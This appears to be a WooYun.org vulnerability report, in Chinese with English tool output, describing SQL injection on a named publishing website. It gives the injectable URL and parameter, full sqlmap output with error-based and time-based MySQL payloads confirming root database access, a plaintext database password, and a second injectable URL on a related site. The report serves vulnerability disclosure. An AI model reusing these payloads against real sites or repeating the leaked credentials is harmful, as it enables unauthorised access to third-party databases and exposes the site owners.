WooYun.org

2.sql注射
http://www.pishu.com.cn/skwx_ps/WikiTypeListSiteID=14&Type=Relative&RelativeIDs=%27
权限很大root & dba
账号：root

密码：ssap5936
但不支持外联~good~
586个表
[18:02:53] [INFO] the SQL query used returns 586 entries

E:\Users\ghost\Desktop\sqlmap>sqlmap.py -u "http://www.pishu.com.cn/skwx_ps/Wiki
TypeList?SiteID=14&Type=Relative&RelativeIDs=" --current-user
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 19:30:47
[19:30:47] [INFO] resuming back-end DBMS 'mysql'
[19:30:47] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: RelativeIDs
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
Payload: SiteID=14&Type=Relative&RelativeIDs=-8916) OR (SELECT 9112 FROM(SEL
ECT COUNT(*),CONCAT(0x3a6f66723a,(SELECT (CASE WHEN (9112=9112) THEN 1 ELSE 0 EN
D)),0x3a61787a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
BY x)a) AND (8248=8248
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: SiteID=14&Type=Relative&RelativeIDs=-1062) OR 6289=SLEEP(5) AND (60
19=6019
---
[19:30:50] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0
[19:30:50] [INFO] fetching current user
[19:30:56] [INFO] resumed: root@%
current user: 'root@%'
[19:30:56] [INFO] fetched data logged to text files under 'E:\Users\ghost\Deskto
p\sqlmap\output\www.pishu.com.cn'
[*] shutting down at 19:30:56
E:\Users\ghost\Desktop\sqlmap>
另外一个注射：
http://books.ssap.com.cn/MallStore/Store_Periodical.aspx?bookclass=449‘

不深入~